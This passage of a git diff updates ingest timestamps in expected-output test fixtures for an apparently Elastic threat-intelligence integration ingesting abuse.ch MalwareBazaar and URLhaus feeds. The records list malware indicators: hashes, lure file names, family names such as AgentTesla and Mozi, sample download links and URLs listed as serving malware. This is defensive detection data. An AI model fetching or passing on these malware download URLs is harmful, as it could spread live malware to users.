"2021-12-14T14:56:11.724493127Z", "original": "{\"md5_hash\":\"aa81ceea053797a6f8c38a0f2f9b80b0\",\"sha256_hash\":\"dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:06:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo\",\"tlsh\":\"CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -693,7 +693,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808106100Z", + "ingested": "2021-12-14T14:56:11.724493511Z", "original": "{\"md5_hash\":\"a2ce6795664c0fa93b07fa54ba868991\",\"sha256_hash\":\"0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:06:13\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY\",\"tlsh\":\"8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -739,7 +739,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808119Z", + "ingested": "2021-12-14T14:56:11.724493897Z", "original": "{\"md5_hash\":\"9b9bac158dacb9c2f5511e9c464a7de4\",\"sha256_hash\":\"07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:52\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk\",\"tlsh\":\"6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317\"}", "category": "threat", "type": "indicator", 
@@ -785,7 +785,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808131Z", + "ingested": "2021-12-14T14:56:11.724494411Z", "original": "{\"md5_hash\":\"e48e3fa5e0f7b21c1ecf1efc81ff91e8\",\"sha256_hash\":\"708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:51\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj\",\"tlsh\":\"6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -833,7 +833,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808142500Z", + "ingested": "2021-12-14T14:56:11.724494802Z", "original": "{\"md5_hash\":\"8957f5347633ab4b10c2ae4fb92c8572\",\"sha256_hash\":\"f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:50\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM\",\"tlsh\":\"0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", 
@@ -879,7 +879,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808153800Z", + "ingested": "2021-12-14T14:56:11.724495202Z", "original": "{\"md5_hash\":\"09cc76b7077b4d5704e46e864575ff03\",\"sha256_hash\":\"94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js\",\"tlsh\":\"BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -925,7 +925,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808172600Z", + "ingested": "2021-12-14T14:56:11.724495607Z", "original": "{\"md5_hash\":\"98a1cdf7de4232363f1d1e0f33dbfd99\",\"sha256_hash\":\"909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:16\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+\",\"tlsh\":\"C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", 
@@ -973,7 +973,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808282800Z", + "ingested": "2021-12-14T14:56:11.724495990Z", "original": "{\"md5_hash\":\"8a51830c1662513ba6bd44e2f7849547\",\"sha256_hash\":\"d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:15\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/\",\"tlsh\":\"1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -1019,7 +1019,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808295800Z", + "ingested": "2021-12-14T14:56:11.724496371Z", "original": "{\"md5_hash\":\"ae21d742a8118d6b86674aa5370bd6a7\",\"sha256_hash\":\"3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:12\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS\",\"tlsh\":\"5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317\"}", "category": "threat", "type": "indicator", 
@@ -1065,7 +1065,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808313200Z", + "ingested": "2021-12-14T14:56:11.724496765Z", "original": "{\"md5_hash\":\"78c9d88d24ed1d982a83216eed1590f6\",\"sha256_hash\":\"d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:38\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -1111,7 +1111,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808326100Z", + "ingested": "2021-12-14T14:56:11.724497259Z", "original": "{\"md5_hash\":\"236577d5d83e2a8d08623a7a7f724188\",\"sha256_hash\":\"8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa\",\"file_type\":\"dll\",\"file_size\":\"241664\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:26\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/\",\"virustotal\":null,\"imphash\":\"ed2860c18f5483e3b5388bad75169dc1\",\"ssdeep\":\"6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC\",\"tlsh\":\"8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5\"}", "category": "threat", "type": "indicator", 
@@ -1157,7 +1157,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808337400Z", + "ingested": "2021-12-14T14:56:11.724497640Z", "original": "{\"md5_hash\":\"ff60107d82dcda7e6726d214528758e7\",\"sha256_hash\":\"fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:20\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU\",\"tlsh\":\"9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json index 4f40d0b8266..d0ce7629fcd 100644 --- a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json 
@@ -56,7 +56,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442181300Z", + "ingested": "2021-12-14T14:56:14.278574446Z", "original": "{\"sha256_hash\":\"5bce7d528c1363104a93fbb5a7fa9bdd991ce929cc09cc7fb29052a68d4fd24b\",\"sha3_384_hash\":\"3b454eb6421d17d093f19292b64d30bf918cb91e9322d0e2d2512857997f574ea2ca5b005133c16f6c33c7cee9c1bd0e\",\"sha1_hash\":\"a71fd0504821092e003f350080a6bcc5fa6a972e\",\"md5_hash\":\"0af07660056a692b7cb82fa329221ddd\",\"first_seen\":\"2021-04-06 20:34:58\",\"last_seen\":null,\"file_name\":\"SALM0BRU.exe\",\"file_size\":399872,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"F9848B24AF932F9BC6CCC1FE50C2D165C9A9F85DD2B1251A73B6CB89FE00544ED2C686\",\"telfhash\":null,\"ssdeep\":\"3072:DsPPK3p+8r5igrL1Tq50cVBDmDJhE9yV4veedHrP6FXK7:D+PL8bronBDmDJ69JeedHriFG\",\"tags\":[\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"15\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -116,7 +116,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442192600Z", + "ingested": "2021-12-14T14:56:14.278576397Z", "original": "{\"sha256_hash\":\"83d0429a2c5f1b611ebc30391eeeb75bebb51212ee1af51dbcf2624b48f9d27f\",\"sha3_384_hash\":\"0a1536add280715320040d5ac5340d3b205d90045ff5c90993b8e909edb9b3e9338b3ffbb3febcaf82584d00d516e8c7\",\"sha1_hash\":\"c454be4eb0892d61a4ad6bac16f97724e73cd795\",\"md5_hash\":\"296aad7075596d21516b30bfbc17fcac\",\"first_seen\":\"2021-04-06 20:32:25\",\"last_seen\":null,\"file_name\":\"PO_NO.ENQUIRY-210604.zip\",\"file_size\":476768,\"file_type_mime\":\"application/zip\",\"file_type\":\"zip\",\"reporter\":\"GovCERT_CH\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"74A4233B9A6D5CA02B224AA69F37537D13A8406300944EAEFD375CA431583056B9F6FF\",\"telfhash\":null,\"ssdeep\":\"12288:j++y4mulTPaYJSaHwvJblQpLGwYeHU9vPpNGd+Zr:j3HPaMtQxblje01pNHZr\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"11\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -184,7 +184,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:06.442200600Z", + "ingested": "2021-12-14T14:56:14.278576829Z", "original": "{\"sha256_hash\":\"f4910ea08d14eeb634084de47cf590d4dc5e554552f111da20d22ae71d7b425b\",\"sha3_384_hash\":\"ee7586cb085fde3c14c9c1bea4635ccb30b1af2020f64e87a9983e61b05026ec9b35255670a3d9ecaab436c4ba302dcc\",\"sha1_hash\":\"bf103996196df8255881127dee103c22fc12bef3\",\"md5_hash\":\"a4838dd31c672122441bebcbf7e9d277\",\"first_seen\":\"2021-04-06 20:12:29\",\"last_seen\":null,\"file_name\":\"DropDll.dat\",\"file_size\":435926,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":\"Hancitor\",\"imphash\":\"0b5a952a025c2783c3126cdb9bef2844\",\"tlsh\":\"0C947D11BA96C473E572163008399F6A17BE7A900B704BDBE3CC097E4E755C24B36BA7\",\"telfhash\":null,\"ssdeep\":\"12288:L2X/txpFDEVkUNglTovKfoLy+hqK/cEUMMlGOG:RzglgLm/9lGOG\",\"tags\":[\"Hancitor\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -248,7 +248,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442208500Z", + "ingested": "2021-12-14T14:56:14.278577195Z", "original": "{\"sha256_hash\":\"e45ffc61a85c2f5c0cbe9376ff215cad324bf14f925bf52ec0d2949f7d235a00\",\"sha3_384_hash\":\"788f61cf45bbc8cad5775de18d0d5f42c4e028af0aaa34c570645efc96af8ebc3d7fe330aaf22ef34d35360bbd4a708c\",\"sha1_hash\":\"a68ca1b41cb93fe2879bb3baeb8e19990758f099\",\"md5_hash\":\"8d7c8b55ac49d241fb7f75a27a5ef8d5\",\"first_seen\":\"2021-04-06 20:07:59\",\"last_seen\":null,\"file_name\":\"vabsheche.py\",\"file_size\":11717,\"file_type_mime\":\"text/x-script.python\",\"file_type\":\"unknown\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"AE3222515C6A881A03B3C66F7992B844FB588303C7116607F6FC86782F79568CAF1BBD\",\"telfhash\":null,\"ssdeep\":\"192:z7X/yHo/yz/yBKiSOINLyhQMYd+LiTfq6LTf3ZoTta3Grj6rg2:z7CIKnNNLwufPfAPq7\",\"tags\":[\"backdoor\",\"python\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"27\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -311,7 +311,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442216400Z", + "ingested": "2021-12-14T14:56:14.278577553Z", "original": "{\"sha256_hash\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4\",\"sha3_384_hash\":\"752e5d56a166227d06f8cbd40cd3f693f543f9c3f798c673c1430957bb7e149a12d9158138fa449479105f472e70f68f\",\"sha1_hash\":\"e8378aede9f26f09b7d503d79a05d67612be15f6\",\"md5_hash\":\"fe185f106730583156f39233f77f8019\",\"first_seen\":\"2021-04-06 20:00:48\",\"last_seen\":null,\"file_name\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4.bin\",\"file_size\":7929856,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"13863341B085EE2EE2CA41BA0DA9C2BD43B63D131E054F677269B72D3EB76E0E7D4144\",\"telfhash\":null,\"ssdeep\":\"196608:KQaeKLOiBEp+uc+iuYmbMdHmN1Rwyd2jecXeaH1pHE+2:oeIOTp+p+iNJC1ChjhXZ1pHz2\",\"tags\":[\"maldoc\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"21\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -378,7 +378,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442224300Z", + "ingested": "2021-12-14T14:56:14.278577927Z", "original": "{\"sha256_hash\":\"2d705f0b76f24a18e08163db2f187140ee9f03e43697a9ea0d840c829692d43c\",\"sha3_384_hash\":\"c82132559381b7b3b184b4ce8c7a58c301a46001621f346b637139f5987dee968ae2ef009a17b2388852b2db15a45b58\",\"sha1_hash\":\"b2da45913353bfc66d189455f9ad80ef26968143\",\"md5_hash\":\"70da6872b6b2da9ddc94d14b02302917\",\"first_seen\":\"2021-04-06 19:58:50\",\"last_seen\":null,\"file_name\":\"winlog.wll\",\"file_size\":131584,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":\"6476b7c4dd55eafbdf922a7ba1e2d5f9\",\"tlsh\":\"A2D38C067790C071DAAF013908799E624B7F7D70DDB49D8B77841A8E69342D0AF3AB27\",\"telfhash\":null,\"ssdeep\":\"1536:2NVi7z0r0lJRn6I8+YDgr1fnWG5Ff0+adgBYlCtMiQMX1c0E4JsWjcdonPv870E1:YM7zh8+Cofnp5eRm6riQ6OZoPv870E\",\"tags\":[\"apt\",\"tonto\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -438,7 +438,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442232300Z", + "ingested": "2021-12-14T14:56:14.278578281Z", "original": "{\"sha256_hash\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606\",\"sha3_384_hash\":\"a3ec981ed158fe08cc2cd97303807cfbed147e59ccfd92fcaa9395c5718b4d9b892d6e9fa6337f5976dc1bd042562fe4\",\"sha1_hash\":\"3d613d5678e43faeea1c636185a0b4c3ec80e742\",\"md5_hash\":\"de80e1d7d9f5b1c64ec9f8d4f5063989\",\"first_seen\":\"2021-04-06 19:58:44\",\"last_seen\":null,\"file_name\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606.bin.sample\",\"file_size\":1088000,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"8635D001BA82C573D5621A35083ADBAA177E7D604F704ADBB3C83B2E5D355C14B32BA7\",\"telfhash\":null,\"ssdeep\":\"24576:WKEiZxl3A4yJJG2dPQQCthXzglgLm/9lGO:WKEGByvGOQQC/XElga/9lGO\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"32\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", 
@@ -510,7 +510,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:06.442240100Z", + "ingested": "2021-12-14T14:56:14.278578631Z", "original": "{\"sha256_hash\":\"84f983067868de50e5b1553782c056c1f5b5118bb2084473ca4b6908f221cd3b\",\"sha3_384_hash\":\"138dc28a74d15c1f9797ce732e99097c8c6db4549cb17cb7b20c1c6738a170328e45aea2d4c3b593912f14a97f521c1d\",\"sha1_hash\":\"00b52e8ca1785d5086703ad8cff1d28fc3354934\",\"md5_hash\":\"2759c73c986c6a757bf9d25621c5595a\",\"first_seen\":\"2021-04-06 19:52:32\",\"last_seen\":null,\"file_name\":\"Purchase Order.8000.scan.pdf...exe\",\"file_size\":752128,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"SnakeKeylogger\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"23F4AE212684C9C0D93E67B4D43584F003BABD16D631F69F6E887C693EB32D2D63B646\",\"telfhash\":null,\"ssdeep\":\"12288:8t11ulRZRLZNh4YeX6f6XmwNShqE73YXy7moh:S11gZpZNmBX06WmAcy7m0\",\"tags\":[\"exe\",\"SnakeKeylogger\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"38\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", 
@@ -582,7 +582,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:06.442248100Z", + "ingested": "2021-12-14T14:56:14.278579005Z", "original": "{\"sha256_hash\":\"0661d87116f44cbd5b5c6bec7fb06c4e5cd5b6ecbc5455d959e65f1ee46c54c8\",\"sha3_384_hash\":\"ed5d03454121d81adf65a01ba90af81b1a7cea052709c22bb9170508069d17242861f85e5546b2cc3efb07c10926368c\",\"sha1_hash\":\"a34fd5e57d75d17bc2d84055ca4752e5ee2e92f5\",\"md5_hash\":\"596b3dbf07a287dcf76860b5e54762c3\",\"first_seen\":\"2021-04-06 19:47:13\",\"last_seen\":null,\"file_name\":\"New Order PO#121012020_____PDF_______.exe\",\"file_size\":836096,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"AgentTesla\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"A505CF712694C9A4FABD53B80434403007F5FE42E232FA9A6FD17C993E72782DA3B655\",\"telfhash\":null,\"ssdeep\":\"12288:qRedcNeqimzAEmN03VgdZfBOMx+RVBM7pdWje9ppB5nAZGNY2:ZaNeqikqN0udZfBFUYp55nFN\",\"tags\":[\"AgentTesla\",\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"40\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json index 1afae375bb2..3c98bc9320f 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json 
@@ -39,7 +39,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024388900Z", + "ingested": "2021-12-14T14:56:15.726381621Z", "original": "{\"id\":\"961548\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961548/\",\"url\":\"http://89.160.20.156:34613/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -88,7 +88,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024427700Z", + "ingested": "2021-12-14T14:56:15.726384263Z", "original": "{\"id\":\"961546\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961546/\",\"url\":\"http://89.160.20.156:44941/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -137,7 +137,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024435500Z", + "ingested": "2021-12-14T14:56:15.726384695Z", "original": "{\"id\":\"961547\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961547/\",\"url\":\"http://89.160.20.156:37173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -186,7 +186,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024442600Z", + "ingested": "2021-12-14T14:56:15.726385185Z", "original": "{\"id\":\"961545\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961545/\",\"url\":\"http://89.160.20.156:47545/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -235,7 +235,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024449900Z", + "ingested": "2021-12-14T14:56:15.726385558Z", "original": "{\"id\":\"961544\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961544/\",\"url\":\"http://89.160.20.156:44782/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -284,7 +284,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024457300Z", + "ingested": "2021-12-14T14:56:15.726385940Z", "original": 